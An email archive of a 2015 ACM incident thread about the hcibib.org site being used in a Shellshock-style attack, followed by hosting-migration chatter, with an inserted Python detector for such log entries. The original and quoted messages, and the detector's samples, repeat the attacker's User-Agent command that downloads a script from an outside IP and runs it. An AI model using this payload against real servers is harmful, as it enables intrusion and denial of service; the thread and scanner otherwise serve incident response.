From SRS0+0c827f6c0b131e60=FR=hq.acm.org=greenberg@srs.acm.org  Wed May  6 19:34:24 2015
Return-Path: <SRS0+0c827f6c0b131e60=FR=hq.acm.org=greenberg@srs.acm.org>
Received: from acmsmtp02.acm.org ([172.16.10.79])
	by turing.acm.org (8.13.1/8.13.1) with ESMTP id t46NYNiI003817
	for <perlman@turing.acm.org>; Wed, 6 May 2015 19:34:23 -0400
Received: from in-009.ord.mailroute.net
        by acmsmtp02.acm.org (ACM Email Forwarding Service) with ESMTP (SSL) id 2201505061934254713
        for <perlman@acm.org>; Wed, 06 May 2015 19:34:25 -0400
Received: from localhost (localhost.localdomain [127.0.0.1])
	by in-009.ord.mailroute.net (Postfix) with ESMTP id 3lhvQT734xz1dyqf
	for <perlman@acm.org>; Wed,  6 May 2015 23:34:25 +0000 (UTC)
X-Virus-Scanned: by MailRoute
X-Spam-Flag: NO
X-Spam-Score: 2.539
X-Spam-Level: **
X-Spam-Status: No, score=2.539 tagged_above=-9999 tests=[HTML_MESSAGE=0.001,
	KAM_BADIPHTTP=2, KAM_LOTSOFHASH=0.25, NORMAL_HTTP_TO_IP=0.001,
	RCVD_IN_BACKSCATTERER=0.5, RCVD_IN_MSPIKE_H2=-0.211,
	SPF_HELO_PASS=-0.001, SPF_PASS=-0.001] autolearn=disabled
Received: from in-009.ord.mailroute.net ([199.89.2.12])
	by localhost (009.ord.mailroute.net [127.0.0.1]) (mroute_mailscanner, port 10024)
	with LMTP id yjXLQj-1fb5D; Wed,  6 May 2015 23:34:20 +0000 (UTC)
Received: from na01-bl2-obe.outbound.protection.outlook.com (mail-bl2on0085.outbound.protection.outlook.com [65.55.169.85])
	(using TLSv1.2 with cipher ECDHE-RSA-AES256-SHA384 (256/256 bits))
	(No client certificate requested)
	by in-009.ord.mailroute.net (Postfix) with ESMTPS id 3lhvQM1tJtz1f0QQ;
	Wed,  6 May 2015 23:34:18 +0000 (UTC)
Received: from BN3PR0501MB1235.namprd05.prod.outlook.com (25.160.183.139) by
 BLUPR0501MB1826.namprd05.prod.outlook.com (25.163.121.149) with Microsoft
 SMTP Server (TLS) id 15.1.154.19; Wed, 6 May 2015 23:34:16 +0000
Received: from BN3PR0501MB1235.namprd05.prod.outlook.com ([25.160.183.139]) by
 BN3PR0501MB1235.namprd05.prod.outlook.com ([25.160.183.139]) with mapi id
 15.01.0154.018; Wed, 6 May 2015 23:34:16 +0000
From: Adam Greenberg <greenberg@hq.acm.org>
To: "perlman@acm.org" <perlman@acm.org>
CC: Ken Bauer <kenbauer@acm.org>, ishelpdesk <ishelpdesk@hq.acm.org>
Subject: hcibib.org website problem
Thread-Topic: hcibib.org website problem
Thread-Index: AdCIVAQwEwjlfZlbTOO9JKrPpQ0dMg==
Importance: high
X-Priority: 1
Date: Wed, 6 May 2015 23:34:16 +0000
Message-ID: <BN3PR0501MB123593A3CC77235DDD7190659FD00@BN3PR0501MB1235.namprd05.prod.outlook.com>
Accept-Language: en-US
Content-Language: en-US
X-MS-Has-Attach: yes
X-MS-TNEF-Correlator: 
authentication-results: acm.org; dkim=none (message not signed) header.d=none;
x-originating-ip: [98.15.179.72]
Content-Type: multipart/mixed;
	boundary="_004_BN3PR0501MB123593A3CC77235DDD7190659FD00BN3PR0501MB1235_"
MIME-Version: 1.0
X-OriginatorOrg: hq.acm.org
X-MS-Exchange-CrossTenant-originalarrivaltime: 06 May 2015 23:34:16.1289
 (UTC)
X-MS-Exchange-CrossTenant-fromentityheader: Hosted
X-MS-Exchange-CrossTenant-id: 70f11c93-becb-4ae4-8dcc-9efc90fc7ad6
X-MS-Exchange-Transport-CrossTenantHeadersStamped: BLUPR0501MB1826
Status: R
X-Status: A
X-Keywords:                 

--_004_BN3PR0501MB123593A3CC77235DDD7190659FD00BN3PR0501MB1235_
Content-Type: multipart/alternative;
	boundary="_000_BN3PR0501MB123593A3CC77235DDD7190659FD00BN3PR0501MB1235_"

--_000_BN3PR0501MB123593A3CC77235DDD7190659FD00BN3PR0501MB1235_
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: quoted-printable

Hello Gary,
I had to take the hcibib.org website offline tonight.   The site was used to execute a denial of service attack that took down the server.
Here is the reference from the hcibib.org weblogs

62.75.145.250 - - [06/May/2015:12:12:39 -0400] "GET / HTTP/1.1" 200 10740 "-" "() { :; }; /bin/bash -c 'rm -rf /tmp/dd.sh /tmp/dd1.sh;wget http://62.75.145.250/dd.sh -O /tmp/dd.sh;curl http://62.75.145.250/dd.sh -o /tmp/dd1.sh;sh /tmp/dd.sh & sh /tmp/dd1.sh 0>&1'"

I put the entire weblog for today to your /home/Perlman

The request executed a denial of service attack that started this.
apache   28593     1  0 12:12 ?        00:00:00 /bin/bash -c rm -rf /tmp/dd.sh /tmp/dd1.sh;wget http://62.75.145.250/dd.sh -O /tmp/dd.sh;curl http://62.75.145.250/dd.sh -o /tmp/dd1.sh;sh /tmp/dd.sh & sh /tmp/dd1.sh 0>&1

Attached is a sample of what was running on the server.

I have changed the default document root of the website until I hear from you.  I would prefer to bring the site back online restricted to the IP address that you will be connecting from so that you have time to properly examine your site and then we can open it back up.  Please let me know the IP address you will be connecting from and I will make the appropriate configuration changes.

Thanks
Adam


Adam Greenberg
Senior Systems Analyst
Association for Computing Machinery
2 Penn Plaza
Suite 701
New York, NY 10121
Office: 212-626-0573
greenberg@acm.org


--_000_BN3PR0501MB123593A3CC77235DDD7190659FD00BN3PR0501MB1235_--

--_004_BN3PR0501MB123593A3CC77235DDD7190659FD00BN3PR0501MB1235_
Content-Type: text/plain; name="hcibib-exploit-5-6-2015.txt"
Content-Description: hcibib-exploit-5-6-2015.txt
Content-Disposition: attachment; filename="hcibib-exploit-5-6-2015.txt";
	size=9414; creation-date="Wed, 06 May 2015 23:30:29 GMT";
	modification-date="Wed, 06 May 2015 23:30:29 GMT"
Content-Transfer-Encoding: base64

--_004_BN3PR0501MB123593A3CC77235DDD7190659FD00BN3PR0501MB1235_--
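
Added example, not part of the original messages and not ACM's tooling: a Python check that scans Apache combined-format log lines for the bash function-definition prefix `() {` seen in the User-Agent above, and flags shells owned by the web server account in `ps -ef` output. The account names, the PPID heuristic and the sample lines marked constructed are assumptions of this example.

```python
import re
from typing import Iterable, List, NamedTuple, Tuple

# Apache "combined" format:
#   host ident user [time] "request" status bytes "referer" "user-agent"
# Quoted fields may contain backslash-escaped quotes, so match them explicitly.
COMBINED = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>(?:[^"\\]|\\.)*)" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<agent>.*)"\s*$'
)
# The bash function-definition prefix "() {" seen in the User-Agent above.
FUNC_DEF = re.compile(r'\(\s*\)\s*\{')
# URLs inside the injected command: leads for egress and proxy log review.
URL = re.compile(r'https?://[^\s;\'"]+')
SHELL_NAMES = {"sh", "bash", "dash"}


class Finding(NamedTuple):
    host: str
    time: str
    field: str        # which client-controlled field carried the marker
    status: int       # response code only; it does not prove execution
    urls: List[str]   # de-duplicated, in order of appearance


def scan_access_log(lines: Iterable[str]) -> List[Finding]:
    """Return one Finding per client-controlled field containing '() {'."""
    findings = []
    for line in lines:
        m = COMBINED.match(line.strip())
        if not m:
            continue  # not combined format; a real tool would count these
        for field in ("request", "referer", "agent"):
            value = m.group(field)
            if FUNC_DEF.search(value):
                urls = list(dict.fromkeys(URL.findall(value)))
                findings.append(Finding(m.group("host"), m.group("time"),
                                        field, int(m.group("status")), urls))
    return findings


def suspicious_processes(ps_lines: Iterable[str],
                         web_users=("apache", "www-data", "httpd")
                         ) -> List[Tuple[int, str]]:
    """Flag shells owned by a web server account and reparented to PID 1.

    Input is `ps -ef` output (UID PID PPID C STIME TTY TIME CMD). The account
    names and the PPID == 1 heuristic are assumptions of this example.
    """
    hits = []
    for line in ps_lines:
        parts = line.split(None, 7)
        if len(parts) < 8 or not parts[1].isdigit() or not parts[2].isdigit():
            continue  # header row or truncated line
        uid, pid, ppid, cmd = parts[0], int(parts[1]), int(parts[2]), parts[7]
        program = cmd.split()[0].rsplit("/", 1)[-1]
        if uid in web_users and ppid == 1 and program in SHELL_NAMES:
            hits.append((pid, cmd))
    return hits


# The first data line of each sample is the one quoted in the message above;
# every other line is constructed for this example.
SAMPLE_LOG = r"""
62.75.145.250 - - [06/May/2015:12:12:39 -0400] "GET / HTTP/1.1" 200 10740 "-" "() { :; }; /bin/bash -c 'rm -rf /tmp/dd.sh /tmp/dd1.sh;wget http://62.75.145.250/dd.sh -O /tmp/dd.sh;curl http://62.75.145.250/dd.sh -o /tmp/dd1.sh;sh /tmp/dd.sh & sh /tmp/dd1.sh 0>&1'"
192.0.2.10 - - [06/May/2015:12:13:02 -0400] "GET /index.html HTTP/1.1" 404 209 "() { :;}; echo probe" "Mozilla/5.0"
198.51.100.7 - - [06/May/2015:12:13:05 -0400] "GET /about.html HTTP/1.1" 200 5120 "http://hcibib.org/" "Mozilla/5.0 (X11; Linux x86_64)"
""".strip().splitlines()

SAMPLE_PS = """
UID        PID  PPID  C STIME TTY          TIME CMD
apache   28593     1  0 12:12 ?        00:00:00 /bin/bash -c rm -rf /tmp/dd.sh /tmp/dd1.sh;wget http://62.75.145.250/dd.sh -O /tmp/dd.sh;curl http://62.75.145.250/dd.sh -o /tmp/dd1.sh;sh /tmp/dd.sh & sh /tmp/dd1.sh 0>&1
apache    2101  1990  0 09:00 ?        00:00:01 /usr/sbin/httpd
root      1990     1  0 09:00 ?        00:00:03 /usr/sbin/httpd
""".strip().splitlines()

if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"{f.time} {f.host} marker in {f.field} "
              f"(HTTP {f.status}) urls={f.urls}")
    for pid, cmd in suspicious_processes(SAMPLE_PS):
        print(f"pid {pid}: {cmd[:60]}")
```

The HTTP status in a finding only shows how the request was answered; the `ps` match is what ties a log entry to a process running under the web server account.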

From greenberg@hq.acm.org  Fri May  8 23:42:14 2015
Return-Path: <greenberg@hq.acm.org>
Received: from na01-bn1-obe.outbound.protection.outlook.com (mail-bn1bon0084.outbound.protection.outlook.com [157.56.111.84])
	by turing.acm.org (8.13.1/8.13.1) with ESMTP id t493gELa004931
	for <perlman@turing.acm.org>; Fri, 8 May 2015 23:42:14 -0400
Received: from CY1PR0501MB1241.namprd05.prod.outlook.com (25.160.225.152) by
 CY1PR0501MB1836.namprd05.prod.outlook.com (25.163.141.15) with Microsoft SMTP
 Server (TLS) id 15.1.154.19; Sat, 9 May 2015 03:42:18 +0000
Received: from CY1PR0501MB1241.namprd05.prod.outlook.com ([25.160.225.152]) by
 CY1PR0501MB1241.namprd05.prod.outlook.com ([25.160.225.152]) with mapi id
 15.01.0160.009; Sat, 9 May 2015 03:42:18 +0000
From: Adam Greenberg <greenberg@hq.acm.org>
To: Gary PERLMAN <perlman@turing.acm.org>
CC: Ken Bauer <kenbauer@acm.org>, ishelpdesk <ishelpdesk@hq.acm.org>
Subject: RE: hcibib.org website problem
Thread-Topic: hcibib.org website problem
Thread-Index: AdCIVAQwEwjlfZlbTOO9JKrPpQ0dMgBjVrqAAAoUmrA=
Date: Sat, 9 May 2015 03:42:16 +0000
Message-ID: <CY1PR0501MB1241687AF2DB723952BDC7B09FDD0@CY1PR0501MB1241.namprd05.prod.outlook.com>
References: <BN3PR0501MB123593A3CC77235DDD7190659FD00@BN3PR0501MB1235.namprd05.prod.outlook.com>
 <Pine.LNX.4.64.1505081848190.27144@turing.acm.org>
In-Reply-To: <Pine.LNX.4.64.1505081848190.27144@turing.acm.org>
Accept-Language: en-US
Content-Language: en-US
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
authentication-results: turing.acm.org; dkim=none (message not signed)
 header.d=none;
x-originating-ip: [98.15.179.72]
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
X-OriginatorOrg: hq.acm.org
X-MS-Exchange-CrossTenant-originalarrivaltime: 09 May 2015 03:42:16.5661
 (UTC)
X-MS-Exchange-CrossTenant-fromentityheader: Hosted
X-MS-Exchange-CrossTenant-id: 70f11c93-becb-4ae4-8dcc-9efc90fc7ad6
X-MS-Exchange-Transport-CrossTenantHeadersStamped: CY1PR0501MB1836
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by turing.acm.org id t493gELa004931
Status: R
X-Status: A
X-Keywords:                 

Ok.  What I would like to do then, is move you off of this old turing server and over to our newer hosting environment.
Ishelpdesk is copied on this, I'm asking for us to open a ticket to get Gary Perlman setup on the new server, and all the files from the hcibib.org website synced over to the new server.  
Once Gary checks to make sure it works correctly we can cut DNS over.
There are more filters and controls in place on the new environment, that would help mitigate the issue should it happen again.  
On the current server, this issue shut down this whole box, along with ACM's main website, because it tied up the resources of this server.

Ishelpdesk, please proceed with getting an account setup for Gary, and setting it up to support the hcibib.org website.

Thanks
Adam

-----Original Message-----
From: Gary PERLMAN [mailto:perlman@turing.acm.org] 
Sent: Friday, May 08, 2015 6:50 PM
To: Adam Greenberg
Cc: Ken Bauer; ishelpdesk
Subject: Re: hcibib.org website problem

Well, I am stumped. I don't know what script was used for the attack, and if I did, I am not sure how I would prevent further attacks.

Gary Perlman, Director, HCI Bibliography Project mailto:director@hcibib.org  http://hcibib.org/

On Wed, 6 May 2015, Adam Greenberg wrote:

> Hello Gary,
> I had to take the hcibib.org website offline tonight.   The site was used to execute a denial of service attack that took down the server.
> Here is the reference from the hcibib.org weblogs
>
> 62.75.145.250 - - [06/May/2015:12:12:39 -0400] "GET / HTTP/1.1" 200 10740 "-" "() { :; }; /bin/bash -c 'rm -rf /tmp/dd.sh /tmp/dd1.sh;wget http://62.75.145.250/dd.sh -O /tmp/dd.sh;curl http://62.75.145.250/dd.sh -o /tmp/dd1.sh;sh /tmp/dd.sh & sh /tmp/dd1.sh 0>&1'"
>
> I put the entire weblog for today to your /home/Perlman
>
> The request executed a denial of service attack that started this.
> apache   28593     1  0 12:12 ?        00:00:00 /bin/bash -c rm -rf /tmp/dd.sh /tmp/dd1.sh;wget http://62.75.145.250/dd.sh -O /tmp/dd.sh;curl http://62.75.145.250/dd.sh -o /tmp/dd1.sh;sh /tmp/dd.sh & sh /tmp/dd1.sh 0>&1
>
> Attached is a sample of what was running on the server.
>
> I have changed the default document root of the website until I hear from you.  I would prefer to bring the site back online restricted to the IP address that you will be connecting from so that you have time to properly examine your site and then we can open it back up.  Please let me know the IP address you will be connecting from and I will make the appropriate configuration changes.
>
> Thanks
> Adam
>
>
> Adam Greenberg
> Senior Systems Analyst
> Association for Computing Machinery
> 2 Penn Plaza
> Suite 701
> New York, NY 10121
> Office: 212-626-0573
> greenberg@acm.org
>
>

-- 

From greenberg@hq.acm.org  Sat May  9 10:06:09 2015
Return-Path: <greenberg@hq.acm.org>
Received: from na01-bn1-obe.outbound.protection.outlook.com (mail-bn1on0062.outbound.protection.outlook.com [157.56.110.62])
	by turing.acm.org (8.13.1/8.13.1) with ESMTP id t49E66Ir008286
	for <perlman@turing.acm.org>; Sat, 9 May 2015 10:06:07 -0400
Received: from CY1PR0501MB1241.namprd05.prod.outlook.com (25.160.225.152) by
 CY1PR0501MB1834.namprd05.prod.outlook.com (25.163.141.148) with Microsoft
 SMTP Server (TLS) id 15.1.154.19; Sat, 9 May 2015 14:06:11 +0000
Received: from CY1PR0501MB1241.namprd05.prod.outlook.com ([25.160.225.152]) by
 CY1PR0501MB1241.namprd05.prod.outlook.com ([25.160.225.152]) with mapi id
 15.01.0160.009; Sat, 9 May 2015 14:06:11 +0000
From: Adam Greenberg <greenberg@hq.acm.org>
To: Gary PERLMAN <perlman@turing.acm.org>
CC: Ken Bauer <kenbauer@acm.org>, ishelpdesk <ishelpdesk@hq.acm.org>
Subject: RE: hcibib.org website problem
Thread-Topic: hcibib.org website problem
Thread-Index: AdCIVAQwEwjlfZlbTOO9JKrPpQ0dMgBjVrqAAAoUmrAAFaRiAAAAOgyA
Date: Sat, 9 May 2015 14:06:10 +0000
Message-ID: <CY1PR0501MB1241210170DEA120D155A6EF9FDD0@CY1PR0501MB1241.namprd05.prod.outlook.com>
References: <BN3PR0501MB123593A3CC77235DDD7190659FD00@BN3PR0501MB1235.namprd05.prod.outlook.com>
 <Pine.LNX.4.64.1505081848190.27144@turing.acm.org>
 <CY1PR0501MB1241687AF2DB723952BDC7B09FDD0@CY1PR0501MB1241.namprd05.prod.outlook.com>
 <Pine.LNX.4.64.1505090950260.4925@turing.acm.org>
In-Reply-To: <Pine.LNX.4.64.1505090950260.4925@turing.acm.org>
Accept-Language: en-US
Content-Language: en-US
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
authentication-results: turing.acm.org; dkim=none (message not signed)
 header.d=none;
x-originating-ip: [98.15.179.72]
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
X-OriginatorOrg: hq.acm.org
X-MS-Exchange-CrossTenant-originalarrivaltime: 09 May 2015 14:06:10.6715
 (UTC)
X-MS-Exchange-CrossTenant-fromentityheader: Hosted
X-MS-Exchange-CrossTenant-id: 70f11c93-becb-4ae4-8dcc-9efc90fc7ad6
X-MS-Exchange-Transport-CrossTenantHeadersStamped: CY1PR0501MB1834
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by turing.acm.org id t49E66Ir008286
Status: R
X-Status: A
X-Keywords:                 

Ok. Great.
Let us know if you need any assistance.

Thanks
Adam

-----Original Message-----
From: Gary PERLMAN [mailto:perlman@turing.acm.org] 
Sent: Saturday, May 09, 2015 9:59 AM
To: Adam Greenberg
Cc: Ken Bauer; ishelpdesk
Subject: RE: hcibib.org website problem

I am very sorry to have been unwittingly involved in shutting down acm.org!

I'm a little embarrassed on this, but a move to a new hosting env has been "in the works" since at least last September, when I was given an account (perlman.hosting.acm.org). At the time, I was overwhelmed by the task, but I think I can make progress.

I will work on the file transfers today.

Gary

On Sat, 9 May 2015, Adam Greenberg wrote:

> Ok.  What I would like to do then, is move you off of this old turing server and over to our newer hosting environment.
> Ishelpdesk is copied on this, I'm asking for us to open a ticket to get Gary Perlman setup on the new server, and all the files from the hcibib.org website synced over to the new server.
> Once Gary checks to make sure it works correctly we can cut DNS over.
> There are more filters and controls in place on the new environment, that would help mitigate the issue should it happen again.
> On the current server, this issue shut down this whole box, along with ACM's main website, because it tied up the resources of this server.
>
> Ishelpdesk, please proceed with getting an account setup for Gary, and setting it up to support the hcibib.org website.
>
> Thanks
> Adam
>
> -----Original Message-----
> From: Gary PERLMAN [mailto:perlman@turing.acm.org]
> Sent: Friday, May 08, 2015 6:50 PM
> To: Adam Greenberg
> Cc: Ken Bauer; ishelpdesk
> Subject: Re: hcibib.org website problem
>
> Well, I am stumped. I don't know what script was used for the attack, and if I did, I am not sure how I would prevent further attacks.
>
> Gary Perlman, Director, HCI Bibliography Project mailto:director@hcibib.org  http://hcibib.org/
>
> On Wed, 6 May 2015, Adam Greenberg wrote:
>
>> Hello Gary,
>> I had to take the hcibib.org website offline tonight.   The site was used to execute a denial of service attack that took down the server.
>> Here is the reference from the hcibib.org weblogs
>>
>> 62.75.145.250 - - [06/May/2015:12:12:39 -0400] "GET / HTTP/1.1" 200 10740 "-" "() { :; }; /bin/bash -c 'rm -rf /tmp/dd.sh /tmp/dd1.sh;wget http://62.75.145.250/dd.sh -O /tmp/dd.sh;curl http://62.75.145.250/dd.sh -o /tmp/dd1.sh;sh /tmp/dd.sh & sh /tmp/dd1.sh 0>&1'"
>>
>> I put the entire weblog for today to your /home/Perlman
>>
>> The request executed a denial of service attack that started this.
>> apache   28593     1  0 12:12 ?        00:00:00 /bin/bash -c rm -rf /tmp/dd.sh /tmp/dd1.sh;wget http://62.75.145.250/dd.sh -O /tmp/dd.sh;curl http://62.75.145.250/dd.sh -o /tmp/dd1.sh;sh /tmp/dd.sh & sh /tmp/dd1.sh 0>&1
>>
>> Attached is a sample of what was running on the server.
>>
>> I have changed the default document root of the website until I hear from you.  I would prefer to bring the site back online restricted to the IP address that you will be connecting from so that you have time to properly examine your site and then we can open it back up.  Please let me know the IP address you will be connecting from and I will make the appropriate configuration changes.
>>
>> Thanks
>> Adam
>>
>>
>> Adam Greenberg
>> Senior Systems Analyst
>> Association for Computing Machinery
>> 2 Penn Plaza
>> Suite 701
>> New York, NY 10121
>> Office: 212-626-0573
>> greenberg@acm.org
>>
>>
>
>

-- 

From greenberg@hq.acm.org  Sat May  9 10:13:45 2015
Return-Path: <greenberg@hq.acm.org>
Received: from na01-bn1-obe.outbound.protection.outlook.com (mail-bn1on0094.outbound.protection.outlook.com [157.56.110.94])
	by turing.acm.org (8.13.1/8.13.1) with ESMTP id t49EDi0m009407
	for <perlman@turing.acm.org>; Sat, 9 May 2015 10:13:44 -0400
Received: from CY1PR0501MB1241.namprd05.prod.outlook.com (25.160.225.152) by
 CY1PR0501MB1241.namprd05.prod.outlook.com (25.160.225.152) with Microsoft
 SMTP Server (TLS) id 15.1.160.19; Sat, 9 May 2015 14:13:48 +0000
Received: from CY1PR0501MB1241.namprd05.prod.outlook.com ([25.160.225.152]) by
 CY1PR0501MB1241.namprd05.prod.outlook.com ([25.160.225.152]) with mapi id
 15.01.0160.009; Sat, 9 May 2015 14:13:48 +0000
From: Adam Greenberg <greenberg@hq.acm.org>
To: Gary PERLMAN <perlman@turing.acm.org>
Subject: RE: hcibib.org website problem
Thread-Topic: hcibib.org website problem
Thread-Index: AdCIVAQwEwjlfZlbTOO9JKrPpQ0dMgBjVrqAAAoUmrAAFaRiAAAAOgyAAAA8H4AAABCTVA==
Date: Sat, 9 May 2015 14:13:48 +0000
Message-ID: <yqjh13swl9khuhgpulowleej.1431180824524@email.android.com>
References: <BN3PR0501MB123593A3CC77235DDD7190659FD00@BN3PR0501MB1235.namprd05.prod.outlook.com>
 <Pine.LNX.4.64.1505081848190.27144@turing.acm.org>
 <CY1PR0501MB1241687AF2DB723952BDC7B09FDD0@CY1PR0501MB1241.namprd05.prod.outlook.com>
 <Pine.LNX.4.64.1505090950260.4925@turing.acm.org>
 <CY1PR0501MB1241210170DEA120D155A6EF9FDD0@CY1PR0501MB1241.namprd05.prod.outlook.com>,<Pine.LNX.4.64.1505091010360.8767@turing.acm.org>
In-Reply-To: <Pine.LNX.4.64.1505091010360.8767@turing.acm.org>
Accept-Language: en-US
Content-Language: en-US
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
authentication-results: turing.acm.org; dkim=none (message not signed)
 header.d=none;
x-originating-ip: [98.15.179.72]
Content-Type: multipart/alternative;
	boundary="_000_yqjh13swl9khuhgpulowleej1431180824524emailandroidcom_"
MIME-Version: 1.0
X-OriginatorOrg: hq.acm.org
X-MS-Exchange-CrossTenant-originalarrivaltime: 09 May 2015 14:13:48.3495
 (UTC)
X-MS-Exchange-CrossTenant-fromentityheader: Hosted
X-MS-Exchange-CrossTenant-id: 70f11c93-becb-4ae4-8dcc-9efc90fc7ad6
X-MS-Exchange-Transport-CrossTenantHeadersStamped: CY1PR0501MB1241
Status: R
X-Status: 
X-Keywords:                  

--_000_yqjh13swl9khuhgpulowleej1431180824524emailandroidcom_
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: quoted-printable

SSH isn't running on standard port on the new server. Try using port 7822



Thanks
Adam


-------- Original message --------
From: Gary PERLMAN <perlman@turing.acm.org>
Date: 05/09/2015 10:12 AM (GMT-05:00)
To: Adam Greenberg <greenberg@hq.acm.org>
Cc: Ken Bauer <kenbauer@acm.org>, ishelpdesk <ishelpdesk@hq.acm.org>
Subject: RE: hcibib.org website problem

File transfer via SSH keeps failing. Do you know what parameters I need to connect to turing with FileZilla?

Gary

On Sat, 9 May 2015, Adam Greenberg wrote:

> Ok. Great.
> Let us know if you need any assistance.
>
> Thanks
> Adam
>
> -----Original Message-----
> From: Gary PERLMAN [mailto:perlman@turing.acm.org]
> Sent: Saturday, May 09, 2015 9:59 AM
> To: Adam Greenberg
> Cc: Ken Bauer; ishelpdesk
> Subject: RE: hcibib.org website problem
>
> I am very sorry to have been unwittingly involved in shutting down acm.org!
>
> I'm a little embarrassed on this, but a move to a new hosting env has been "in the works" since at least last September, when I was given an account (perlman.hosting.acm.org). At the time, I was overwhelmed by the task, but I think I can make progress.
>
> I will work on the file transfers today.
>
> Gary
>
> On Sat, 9 May 2015, Adam Greenberg wrote:
>
>> Ok.  What I would like to do then, is move you off of this old turing server and over to our newer hosting environment.
>> Ishelpdesk is copied on this, I'm asking for us to open a ticket to get Gary Perlman setup on the new server, and all the files from the hcibib.org website synced over to the new server.
>> Once Gary checks to make sure it works correctly we can cut DNS over.
>> There are more filters and controls in place on the new environment, that would help mitigate the issue should it happen again.
>> On the current server, this issue shut down this whole box, along with ACM's main website, because it tied up the resources of this server.
>>
>> Ishelpdesk, please proceed with getting an account setup for Gary, and setting it up to support the hcibib.org website.
>>
>> Thanks
>> Adam
>>
>> -----Original Message-----
>> From: Gary PERLMAN [mailto:perlman@turing.acm.org]
>> Sent: Friday, May 08, 2015 6:50 PM
>> To: Adam Greenberg
>> Cc: Ken Bauer; ishelpdesk
>> Subject: Re: hcibib.org website problem
>>
>> Well, I am stumped. I don't know what script was used for the attack, and if I did, I am not sure how I would prevent further attacks.
>>
>> Gary Perlman, Director, HCI Bibliography Project mailto:director@hcibib.org  http://hcibib.org/
>>
>> On Wed, 6 May 2015, Adam Greenberg wrote:
>>
>>> Hello Gary,
>>> I had to take the hcibib.org website offline tonight.   The site was used to execute a denial of service attack that took down the server.
>>> Here is the reference from the hcibib.org weblogs
>>>
>>> 62.75.145.250 - - [06/May/2015:12:12:39 -0400] "GET / HTTP/1.1" 200 10740 "-" "() { :; }; /bin/bash -c 'rm -rf /tmp/dd.sh /tmp/dd1.sh;wget http://62.75.145.250/dd.sh -O /tmp/dd.sh;curl http://62.75.145.250/dd.sh -o /tmp/dd1.sh;sh /tmp/dd.sh & sh /tmp/dd1.sh 0>&1'"
>>>
>>> I put the entire weblog for today to your /home/Perlman
>>>
>>> The request executed a denial of service attack that started this.
>>> apache   28593     1  0 12:12 ?        00:00:00 /bin/bash -c rm -rf /tmp/dd.sh /tmp/dd1.sh;wget http://62.75.145.250/dd.sh -O /tmp/dd.sh;curl http://62.75.145.250/dd.sh -o /tmp/dd1.sh;sh /tmp/dd.sh & sh /tmp/dd1.sh 0>&1
>>>
>>> Attached is a sample of what was running on the server.
>>>
>>> I have changed the default document root of the website until I hear from you.  I would prefer to bring the site back online restricted to the IP address that you will be connecting from so that you have time to properly examine your site and then we can open it back up.  Please let me know the IP address you will be connecting from and I will make the appropriate configuration changes.
>>>
>>> Thanks
>>> Adam
>>>
>>>
>>> Adam Greenberg
>>> Senior Systems Analyst
>>> Association for Computing Machinery
>>> 2 Penn Plaza
>>> Suite 701
>>> New York, NY 10121
>>> Office: 212-626-0573
>>> greenberg@acm.org
>>>
>>>
>>
>>
>
>

--

--_000_yqjh13swl9khuhgpulowleej1431180824524emailandroidcom_--

From kenbauer@gmail.com  Sat May  9 10:14:31 2015
Return-Path: <kenbauer@gmail.com>
Received: from mail-yk0-f180.google.com (mail-yk0-f180.google.com [209.85.160.180])
	by turing.acm.org (8.13.1/8.13.1) with ESMTP id t49EELdV009529
	for <perlman@turing.acm.org>; Sat, 9 May 2015 10:14:30 -0400
Received: by ykep21 with SMTP id p21so27179541yke.3
        for <perlman@turing.acm.org>; Sat, 09 May 2015 07:14:26 -0700 (PDT)
X-Received: by 10.170.197.130 with SMTP id o124mr3066856yke.77.1431180866576;
 Sat, 09 May 2015 07:14:26 -0700 (PDT)
MIME-Version: 1.0
Sender: kenbauer@gmail.com
Received: by 10.13.215.147 with HTTP; Sat, 9 May 2015 07:14:06 -0700 (PDT)
In-Reply-To: <Pine.LNX.4.64.1505091010360.8767@turing.acm.org>
References: <BN3PR0501MB123593A3CC77235DDD7190659FD00@BN3PR0501MB1235.namprd05.prod.outlook.com>
 <Pine.LNX.4.64.1505081848190.27144@turing.acm.org> <CY1PR0501MB1241687AF2DB723952BDC7B09FDD0@CY1PR0501MB1241.namprd05.prod.outlook.com>
 <Pine.LNX.4.64.1505090950260.4925@turing.acm.org> <CY1PR0501MB1241210170DEA120D155A6EF9FDD0@CY1PR0501MB1241.namprd05.prod.outlook.com>
 <Pine.LNX.4.64.1505091010360.8767@turing.acm.org>
From: Ken Bauer <kenbauer@acm.org>
Date: Sat, 9 May 2015 09:14:06 -0500
X-Google-Sender-Auth: F-1GmLjrOH_uOYo8kGYhGP9M0hA
Message-ID: <CAKT5aptJQrHivxMgZOGgRTbBozNCDVOMUSXLqL7EM53LQbfXSA@mail.gmail.com>
Subject: Re: hcibib.org website problem
To: Gary PERLMAN <perlman@turing.acm.org>
Cc: Adam Greenberg <greenberg@hq.acm.org>, ishelpdesk <ishelpdesk@hq.acm.org>
Content-Type: multipart/alternative; boundary=001a113994542968a30515a6c3a6
Status: R
X-Status: 
X-Keywords:                  

--001a113994542968a30515a6c3a6
Content-Type: text/plain; charset=UTF-8

to connect to turing you need to make sure you are using ssh on port 22


On Sat, May 9, 2015 at 9:11 AM, Gary PERLMAN <perlman@turing.acm.org> wrote:

> File transfer via SSH keeps failing. Do you know what parameters I need to
> connect to turing with FileZilla?
>
>
> Gary
>
> On Sat, 9 May 2015, Adam Greenberg wrote:
>
>  Ok. Great.
>> Let us know if you need any assistance.
>>
>> Thanks
>> Adam
>>
>> -----Original Message-----
>> From: Gary PERLMAN [mailto:perlman@turing.acm.org]
>> Sent: Saturday, May 09, 2015 9:59 AM
>> To: Adam Greenberg
>> Cc: Ken Bauer; ishelpdesk
>> Subject: RE: hcibib.org website problem
>>
>> I am very sorry to have been unwittingly involved in shutting down
>> acm.org!
>>
